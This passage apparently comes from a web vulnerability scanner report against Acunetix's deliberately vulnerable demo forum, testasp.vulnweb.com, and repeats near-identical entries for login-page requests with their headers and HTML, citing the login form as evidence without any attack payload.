<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> 